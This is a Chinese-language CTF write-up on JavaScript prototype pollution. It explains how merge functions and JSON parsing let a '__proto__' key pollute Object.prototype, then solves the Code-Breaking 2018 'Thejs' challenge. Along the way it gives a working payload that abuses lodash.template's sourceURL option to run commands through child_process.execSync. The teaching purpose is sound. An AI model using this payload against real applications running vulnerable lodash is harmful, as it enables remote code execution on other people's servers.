0x00 前言

前面的一篇文章中我主要介绍了JavaScript中类和原型的概念，以及简单介绍了什么是原型链以及如何污染，这篇文章，我将介绍在什么情况下原型链会被污染，以及通过ctf题来展示实际场景中如何去利用原型链污染。

0x01 哪些情况下原型链会被污染

上一篇文章我们讲了去修改一个对象的原型中的属性，去影响到新实例化出来的对象，使其带上了我们给对象原型添加的属性，这就是原型链污染，那么在实际应用中哪些情况会存在原型链被污染的可能呢？

我们回想一下在之前介绍JavaScript中对象的时候说过在JavaScript中对象就是键值对的集，并且我们试验过这样一段代码：

var obj = {
   "name": "ErDogQAQ",
   "team": "ATL"
}
​
console.log(obj.name);
console.log(obj.team);
console.log(obj);

发现了对象中存在一个名为__proto__的键，而他就指向他构造函数的原型，我们后面也通过A.__proto__.a = 2;这样修改这个键的值的方式造成了原型链污染，呢么我们也就有思路了，只要找到那些我们能够控制数组（也就是对象）的键名的操作，我们就可以通过修改键名为__proto__并控制它的值的方式来造成原型链污染。

在实际中能够进行这种参数的函数一般有：

• 对象合并（merge）；

• 对象克隆（clone）（本质还是将一个对象合并到空对象中）

我们以合并为例，先搞一个merge函数：

function merge(target, source) {
   for (let key in source) {
       if (key in source && key in target) {
           merge(target[key], source[key])
      } else {
           target[key] = source[key]
      }
  }
}

在合并的过程中存在赋值的操作：target[key] = source[key]那么我们将key改为__proto__是不是就可以原型链污染了呢？我们用代码来实验一下：

let o1 = {}
let o2 = {a: 1, "__proto__": {b: 2}}
merge(o1, o2)
console.log(o1.a, o1.b)
o3 = {}
console.log(o3.b)
console.log(o2)

可以看到，合并确实成功了，o1本来是空对象，现在已经有了属性a和b，但是原型链并没有被污染，新构造的对象o3并没有带上我们预想的属性b。

我们来分析一下原因，随后查看对象o2发现，在我们创建o2的时候，__proto__已将代表了o2的原型，此时去遍历o2的所有键名拿到的值是[a,b]，而__proto__并没有作为键名被赋值，所以我们并没有修改Object的原型。

那么我们如何才能让__protp__被认为是一个键名呢？答案是利用JSON解析。

我们修改一下代码：

let o1 = {}
let o2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}')
merge(o1, o2)
console.log(o1.a, o1.b)
o3 = {}
console.log(o3.b)
console.log(o2)

可以看到这次新建的o3对象已经带上了b属性，说明Object已经被污染，同样我们看o2对象时也可以看到，__proto__也被认为是一个键名了。

这是因为，JSON解析的情况下，__proto__会被认为是一个真正的“键名”，而不代表“原型”，所以在遍历o2的时候会存在这个键。

merge操作是最常见可能控制键名的操作，也最能被原型链攻击，很多常见的库都存在这个问题。

下面我们就开始结合ctf中的题目进行实际分析。

0x02 搭建调试环境

通常在ctf中原型链污染的题目都会直接给出源码，并且源码通常都比较长，直接去看并不能很好的理解代码，所以需要本地搭建一个环境来方便我们本地尝试以及动态调试。

这里以Code-Breaking 2018的Thejs这一题为例。

下载node.js：

这个就不多解释了直接去官网下载并安装就可以了。

安装完后直接在cmd下输入node命令就可以像python一样进入命令交互模式了。

下载源码：

https://github.com/phith0n/code-breaking/tree/master/2018/thejs/web

安装依赖包：

在cmd中进入源码所在的目录，然后直接执行npm install命令就可以自动安装所需的依赖包了。

安装完后可以看到他提示我们发现了4个漏洞，可以运行npm audit fix进行修复，或运行npm audit获取详细信息。

这里我们就运行npm audit看一下详细信息：

可以看到它告诉我们在lodash这个包中有4个原型污染漏洞，这正是我们需要利用的地方所以一会我们就着重看与lodash相关的代码就可以了。（注意这里版本是4.17.4，在新版本中漏洞已经被修复）

调试：

这里我使用VS Code 进行调试，打开VS Code后点击打开文件夹，打开源码所在目录，打开server.js然后点击左边的运行/调试按钮，点击创建 launch.json 文件，选择环境为node.js

然后就会自动在目录下生成一个.vscode文件夹里面有一个launch.json文件，检查program是否为server.js，没有问题直接点击启动程序就能够正常启动或者断点调试了。

0x03 尝试解题

我们先看一下题目源码：

const fs = require('fs')
const express = require('express')
const bodyParser = require('body-parser')
const lodash = require('lodash')
const session = require('express-session')
const randomize = require('randomatic')

const app = express()
app.use(bodyParser.urlencoded({extended: true})).use(bodyParser.json())
app.use('/static', express.static('static'))
app.use(session({
    name: 'thejs.session',
    secret: randomize('aA0', 16),
    resave: false,
    saveUninitialized: false
}))
app.engine('ejs', function (filePath, options, callback) { // define the template engine
    fs.readFile(filePath, (err, content) => {
        if (err) return callback(new Error(err))
        let compiled = lodash.template(content)
        let rendered = compiled({...options})

        return callback(null, rendered)
    })
})
app.set('views', './views')
app.set('view engine', 'ejs')

app.all('/', (req, res) => {
    let data = req.session.data || {language: [], category: []}
    if (req.method == 'POST') {
        data = lodash.merge(data, req.body)
        req.session.data = data
    }
    
    res.render('index', {
        language: data.language, 
        category: data.category
    })
})

app.listen(3000, () => console.log(`Example app listening on port 3000!`))

刚才已经知道了lodash包中有反序列化漏洞，所以我们着重看与lodash相关的代码和我们上传数据的地方就可以了。

......
const lodash = require('lodash')
......
app.engine('ejs', function (filePath, options, callback) { // define the template engine
    fs.readFile(filePath, (err, content) => {
        if (err) return callback(new Error(err))
        let compiled = lodash.template(content)
        let rendered = compiled({...options})

        return callback(null, rendered)
    })
})
......
app.all('/', (req, res) => {
    let data = req.session.data || {language: [], category: []}
    if (req.method == 'POST') {
        data = lodash.merge(data, req.body)		
        req.session.data = data
    }

    res.render('index', {
        language: data.language, 
        category: data.category
    })
})

我们可以看到与lodash相关的代码有两句：

let compiled = lodash.template(content)
data = lodash.merge(data, req.body)

查询官方文档后知道

lodash.template的作用：

简单理解就是一个简单的模板引擎，会将content内容放进模板渲染。

lodash.merge的作用：

这个不用多解释，就是我们日思夜想的对象合并函数了，能够污染原型链的十有八九就是这里了。

那么我们就来试试是否真的能够污染原型链：

我们在代码中下好断点，然后提交参数。

●  if (req.method == 'POST') {           //在这里下断点
       data = lodash.merge(data, req.body)
       req.session.data = data
  }

这里还需要注意，直接提交是不能造成原型链污染的，因为我们之前也试过了，只有在JSON解析的情况下__proto__才会被认为是一个键名，才能够造成原型链污染。那么我们如何才能让我们传入的参数按照JSON解析呢？

这里我们在代码中看到const app = express()题目使用的是express框架，而express框架支持根据Content-Type来解析请求Body，所以我们只需要将Content-Type改为application/json即可。

我们提交一个参数：{"__proto__":{"A":"ATL"}}看看到底会不会造成原型链污染：

提交后我们将代码步过到merge函数处理之后：

可以看到经过merge函数处理data的原型也就是Object中果然带上了A属性，证明了此处存在原型链污染漏洞。

那么我们现在找到了能够污染原型链的地方，接下来就要想想如何利用了，我们又想起了template函数的官方文档中写了可以使用sourceURLs进行调试，那我们就跟进template函数看看：

// Use a sourceURL for easier debugging.
var sourceURL = 'sourceURL' in options ? '//# sourceURL=' + options.sourceURL + '\n' : '';
......
var result = attempt(function() {
  return Function(importsKeys, sourceURL + 'return ' + source)
  .apply(undefined, importsValues);
});

可以看到先是判断options中是否有属性sourceURL，如果有就进行拼接，没有则为空，然后将这个值拼接进new Function的第二个参数。

那么我们现在就有思路了，我们可以利用原型链污染，给Object中插入一个sourceURL属性，当执行到template中时，判断options中原本是没有sourceURL的，但是因为JavaScript的查找机制会一直向上查找，查到Object中时找到了sourceURL，然后就会拼接进new Function造成任意代码执行。

有了攻击思路，那么我们就来构造payload测试：

{"__proto__":{"sourceURL": "\u000areturn e => { for (var a in {}) {delete Object.prototype[a]; } return global.process.mainModule.constructor._load('child_process').execSync('whoami')}\u000a// "}}

提交后我们还是回来看调试信息：

可以看到经过merge函数处理，Object中已经带上了sourceURL属性，我们到template函数时步入在看看能否获取到sourceURL属性：

在这里步入：

可以看到这里sourceURL有值说明这里成功获取到了sourceURL属性，那么我们最后看一下执行结果：

可以看到，成功执行了命令。到此我们就进行了一次完整的原型链污染利用。

0x04 结尾

两篇文章自己觉得还是比较完整的介绍了原型链污染的学习过程，文章很大基础是在大佬文章的基础上进行细化，对于完全没有基础的萌新稍微友好了那么一内内，只能说原理感觉并不难，难点在于如何去分析去利用，大佬还是强呀，自我感觉如果没有大佬的文章以及payload，光凭自己估计知道了存在漏洞也不知道如何去利用，还是要向大佬多多学习。

参考文章：

https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html

https://paper.seebug.org/755/